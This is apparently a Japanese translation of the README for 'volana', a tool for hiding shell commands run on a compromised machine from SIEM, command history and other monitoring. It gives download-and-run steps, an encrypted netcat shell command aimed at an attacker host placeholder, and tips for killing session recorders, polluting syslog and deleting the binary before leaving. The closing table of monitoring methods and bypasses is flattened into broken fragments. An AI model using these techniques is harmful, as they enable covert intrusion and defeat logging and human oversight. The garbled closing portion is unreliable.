
🌒 シェルコマンド難読化による検知システム回避
{ 使用方法 ; 🌚(隠れる対象); 🌞(検出される対象) } ペネトレーションテストにおいて、重要な側面はステルスであることです。そのため、通過後に痕跡を消す必要があります。しかし、多くのインフラはコマンドをログに記録し、リアルタイムでSIEMに送信するため、後からのクリーンアップだけでは無意味になります。volanaは、独自のシェルランタイムを提供することで、侵害したマシン上で実行されたコマンドを隠す簡単な方法を提供します(コマンドを入力すると、volanaが代わりに実行します)。これにより、通過中に痕跡を消すことができます。
インタラクティブなシェルを入手する必要があります。(何とかして起動してください。あなたはハッカーですから、それが仕事です!それ以外の方法)。その後、ターゲットマシンにダウンロードして起動します。これで完了です。これで、ステルスに実行したいコマンドを入力できるようになります。
## GitHubリリースからダウンロード
## 侵害したマシンからインターネットにアクセスできない場合は、別の方法を探してください
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana
## 実行
./volana
## これであなたはレーダー下にいます
volana » echo "こんにちはSIEMチーム!私を見つけられますか?" > /dev/null 2>&1 #少し生意気でも許されます
volana » [コマンド]
volanaコンソールのキーワード:
ring: リングモードを有効にします。各コマンドが他の多くのコマンドと一緒に実行され、痕跡を隠します(システムコールを監視するソリューションから)。exit: volanaコンソールを終了します。非インタラクティブシェル(ウェブシェルやブラインドRCEなど)を利用している場合、encrypt および decrypt サブコマンドを使用できます。
事前に、暗号化キーを組み込んだ volana をビルドする必要があります。
攻撃者マシン上
## 暗号化キー付きでvolanaをビルド
make build.volana-with-encryption
## ターゲットに転送(検出可能な唯一のコマンド)
## [...]
## ステルスに実行したいコマンドを暗号化
## (ここではインタラクティブシェルを得るためのncバインディングシェル)
volana encr "nc [攻撃者IP] [攻撃者ポート] -e /bin/bash"
>>> 暗号化されたコマンド
暗号化されたコマンドをコピーし、RCEを使ってターゲットマシン上で実行します。
./volana decr [暗号化されたコマンド]
## これでバインディングシェルが手に入りました。それをインタラクティブにして、通常通りvolanaを使用してステルスを実現します(./volana)。さらに、バイナリから復号鍵が簡単に取得されるため、離脱前にvolanaバイナリを削除することを忘れないでください。
なぜ単に echo [command] | base64 でコマンドを隠さないのか?
そしてターゲット上で echo [encoded_command] | base64 -d | bash でデコードする。
それは、base64 の使用でアラートを発するシステムや、コマンド内のbase64テキストを検出するシステムから保護する必要があるためです。また、調査を困難にしたいからです。base64は本当の障壁にはなりません。
volana が完全に不可視にする魔法ではないことを理解しておいてください。その目的は、侵入検知と調査を困難にすることです。
検出とは、特定のコマンドが実行された場合にアラートを発することができるかどうかを意味します。
volana の起動コマンドラインだけが捕捉されます。🧠 ただし、実行前にスペースを追加することで、デフォルトのbash動作として履歴に保存されなくなります。
.bash_history、.zsh_historyなどopensnoop)script、screen -L、sexonthebash、ovh-ttyrecなど)
pkill -9 scriptscreen は回避がやや難しいが、入力は記録しない(シークレット入力: stty -echo => 回避)volana を暗号化することで回避可能/var/log/auth.log)
sudo または su コマンドのみlogger -p auth.info "ハッカーはあなたのsyslogソリューションを汚染していません。安心してください")LD_PRELOAD インジェクション
クリックベイトなタイトルで申し訳ありませんが、貢献者に対して報酬は支払われません。🐛
以下のものを見つけた場合はお知らせください:
volana を検出する方法volana のコマンドを検出しないコンソール監視方法